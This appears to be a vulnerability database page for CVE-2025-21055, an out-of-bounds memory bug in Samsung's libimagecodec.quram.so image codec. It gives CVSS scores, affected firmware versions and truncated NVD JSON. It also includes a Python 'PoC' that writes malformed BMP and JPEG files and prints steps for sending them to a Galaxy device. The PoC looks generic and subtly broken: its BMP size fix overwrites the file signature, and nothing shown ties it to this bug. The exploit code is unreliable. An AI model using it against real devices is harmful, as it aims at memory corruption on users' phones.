CVE-2025-21055

Description

Out-of-bounds read and write in libimagecodec.quram.so prior to SMR Oct-2025 Release 1 allows remote attackers to access out-of-bounds memory.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:samsung:android:13.0:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:samsung:android:13.0:smr-apr-2022-r1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:samsung:android:13.0:smr-apr-2023-r1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:samsung:android:13.0:smr-apr-2024-r1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:samsung:android:13.0:smr-apr-2025-r1:*:*:*:*:*:* - VULNERABLE

Samsung Galaxy设备固件 < SMR Oct-2025 Release 1

所有搭载受影响版本libimagecodec.quram.so的Samsung Galaxy系列设备

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-21055 PoC - Samsung libimagecodec.quram.so Out-of-bounds Read/Write
# This PoC generates a malformed image file that triggers OOB read/write
# in Samsung's image codec library (libimagecodec.quram.so)

import struct
import sys

def generate_malicious_image(output_path):
    """
    Generate a crafted image that triggers out-of-bounds memory access
    in Samsung's libimagecodec.quram.so codec library.
    
    The exploit works by creating an image with manipulated dimension
    or metadata fields that cause the decoder to read/write beyond
    allocated buffer boundaries.
    """
    
    # BMP file header with manipulated dimensions to trigger OOB access
    bmp_header = bytearray()
    
    # BMP Signature
    bmp_header += b'BM'
    
    # File size (will be updated)
    bmp_header += struct.pack('<I', 0)
    
    # Reserved fields
    bmp_header += struct.pack('<HH', 0, 0)
    
    # Pixel data offset
    bmp_header += struct.pack('<I', 54)
    
    # DIB header (BITMAPINFOHEADER)
    bmp_header += struct.pack('<I', 40)          # Header size
    bmp_header += struct.pack('<i', 0x7FFFFFFF)  # Width - INT_MAX to trigger OOB read
    bmp_header += struct.pack('<i', 1)           # Height
    bmp_header += struct.pack('<HH', 1, 32)      # Planes, Bits per pixel
    bmp_header += struct.pack('<I', 0)           # Compression (BI_RGB)
    bmp_header += struct.pack('<I', 0)           # Image size
    bmp_header += struct.pack('<i', 0)           # X pixels per meter
    bmp_header += struct.pack('<i', 0)           # Y pixels per meter
    bmp_header += struct.pack('<I', 0)           # Colors used
    bmp_header += struct.pack('<I', 0)           # Important colors
    
    # Minimal pixel data to pass initial parsing
    pixel_data = b'\x00' * 1024
    
    # Combine headers and data
    malicious_image = bytes(bmp_header) + pixel_data
    
    # Update file size
    file_size = len(malicious_image)
    malicious_image = struct.pack('<I', file_size) + malicious_image[4:]
    
    with open(output_path, 'wb') as f:
        f.write(malicious_image)
    
    print(f"[+] Malicious image generated: {output_path}")
    print(f"[+] File size: {file_size} bytes")
    print(f"[+] Crafted width: 0x7FFFFFFF (triggers OOB access in decoder)")

def generate_poc_jpeg(output_path):
    """
    Alternative PoC: Generate a malformed JPEG with corrupted
    dimension markers to trigger OOB in the codec.
    """
    # Minimal valid JPEG structure with corrupted SOF marker
    jpeg_data = bytearray()
    
    # SOI (Start of Image)
    jpeg_data += b'\xFF\xD8'
    
    # APP0 marker (JFIF) - minimal
    jpeg_data += b'\xFF\xE0'
    jpeg_data += struct.pack('>H', 16)    # Length
    jpeg_data += b'JFIF\x00'              # Identifier
    jpeg_data += b'\x01\x01'              # Version
    jpeg_data += b'\x00'                  # Units
    jpeg_data += struct.pack('>HH', 1, 1) # Density
    jpeg_data += b'\x00\x00'              # Thumbnail
    
    # DQT (Define Quantization Table) - minimal
    jpeg_data += b'\xFF\xDB'
    jpeg_data += struct.pack('>H', 67)    # Length
    jpeg_data += b'\x00'                  # Table ID
    jpeg_data += bytes(64)                # Quantization values
    
    # SOF0 (Start of Frame) with corrupted dimensions
    jpeg_data += b'\xFF\xC0'
    jpeg_data += struct.pack('>H', 11)    # Length
    jpeg_data += b'\x08'                  # Precision (8 bits)
    jpeg_data += struct.pack('>H', 0xFFFF) # Height - corrupted to trigger OOB
    jpeg_data += struct.pack('>H', 0xFFFF) # Width - corrupted to trigger OOB
    jpeg_data += b'\x03'                  # Number of components
    jpeg_data += b'\x01\x22\x00'          # Component 1
    jpeg_data += b'\x02\x11\x01'          # Component 2
    jpeg_data += b'\x03\x11\x01'          # Component 3
    
    # DHT (Define Huffman Table) - minimal
    jpeg_data += b'\xFF\xC4'
    jpeg_data += struct.pack('>H', 31)    # Length
    jpeg_data += b'\x00'                  # DC table 0
    jpeg_data += bytes(16)                # Counts
    jpeg_data += bytes(12)                # Values
    
    # SOS (Start of Scan)
    jpeg_data += b'\xFF\xDA'
    jpeg_data += struct.pack('>H', 12)    # Length
    jpeg_data += b'\x03'                  # Number of components
    jpeg_data += b'\x01\x00'              # Component 1
    jpeg_data += b'\x02\x11'              # Component 2
    jpeg_data += b'\x03\x11'              # Component 3
    jpeg_data += b'\x00\x3F\x00'          # Spectral selection
    
    # Scan data (minimal)
    jpeg_data += b'\x00' * 100
    
    # EOI (End of Image)
    jpeg_data += b'\xFF\xD9'
    
    with open(output_path, 'wb') as f:
        f.write(bytes(jpeg_data))
    
    print(f"[+] Malicious JPEG generated: {output_path}")

if __name__ == '__main__':
    output = sys.argv[1] if len(sys.argv) > 1 else 'poc_cve_2025_21055.bin'
    
    # Generate both PoC variants
    generate_malicious_image(output)
    generate_poc_jpeg(output.replace('.bin', '.jpg'))
    
    print("\n[*] Usage: Send the generated file to a Samsung Galaxy device")
    print("[*] Trigger: Open the image in any app that uses the system codec")
    print("[*] Effect: Out-of-bounds memory read/write in libimagecodec.quram.so")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-21055
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-21055
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-21055/
[4] VulDB https://vuldb.com/cve/CVE-2025-21055
[5] https://security.samsungmobile.com/securityUpdate.smsb?year=2025&month=10

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-21055", "sourceIdentifier": "[email protected]", "published": "2025-10-10T07:15:41.270", "lastModified": "2025-10-23T12:40:20.293", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Out-of-bounds read and write in libimagecodec.quram.so prior to SMR Oct-2025 Release 1 allows remote attackers to access out-of-bounds memory."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:-:*:*:*:*:*:*", "matchCriteriaId": "A123EDB1-3048-44B0-8D4D-39A2B24B5F6B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-apr-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "BDE4D65E-8F9B-4810-AED6-95564A97D741"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-apr-2023-r1:*:*:*:*:*:*", "matchCriteriaId": "70825981-F895-4BFD-9B6E-92BFF0D67023"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-apr-2024-r1:*:*:*:*:*:*", "matchCriteriaId": "A5E68B7B-BA08-4E8C-B60A-B3836C6986BC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-apr-2025-r1:*:*:*:*:*:*", "matchCriteriaId": "AC42E785-02BF-4F27-B5CF-49572A2DBC8E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-aug-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "0AF1EDA0-2712-4C3C-8D8A-89E154BB63DF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-aug-2023-r1:*:*:*:*:*:*", "matchCriteriaId": "88DC0A82-CAF3-4E88-8A4D-8AF79D0C226D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-aug-2024-r1:*:*:*:*:*:*", "matchCriteriaId": "6239D93F-CA0E-4120-96A1-FB63276EAEE8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-aug-2025-r1:*:*:*:*:*:*", "matchCriteriaId": "25F19D02-1FFC-48AF-9CB8-063C459E7A4B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-dec-2021-r1:*:*:*:*:*:*", "matchCriteriaId": "CD382E2D-0B51-4908-989A-88E083FC85BF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-dec-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "299284DA-85AB-4162-B858-E67E5C6C14F7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-dec-2023-r1:*:*:*:*:*:*", "matchCriteriaId": "38B7AB56-AB65-4557-A91C-40CA2FD12351"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-dec-2024-r1:*:*:*:*:*:*", "matchCriteriaId": "858B0736-2272-4D5A-A77F-47023D21F7D0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-feb-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "61D507C0-086B-4139-A560-126964DFA579"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-feb-2023-r1:*:*:*:*:*:*", "matchCriteriaId": "D98F307E-3B01-4C17-86E5-1C6299919417"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-feb-2024-r1:*:*:*:*:*:*", "matchCriteriaId": "952CA843-7CF0-4424-BDA4-3F2A93E077B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-feb-2025-r1:*:*:*:*:*:*", "matchCriteriaId": "39F64BAA-2E49-4919-A940-219391383D5E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-jan-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "57B125ED-D939-4CBC-9E96-BBCF02402A69"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-jan-2023-r1:*:*:*:*:*:*", "matchCriteriaId": "7D7DA96D-9C25-4DDA-A6BF-D998AC346B89"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-jan-2024-r1:*:*:*:*:*:*", "matchCriteriaId": "07AC19C6-D245-4C3A-90CC-A931A901EA0A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-jan-2025-r1:*:*:*:*:*:*", "matchCriteriaId": "FDA1685E-D101-46F6-8857-7F0894E07748"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-jul-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "DF85AA7B-E1C7-4946-92B4-E4D545CAACDF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:sa ... (truncated)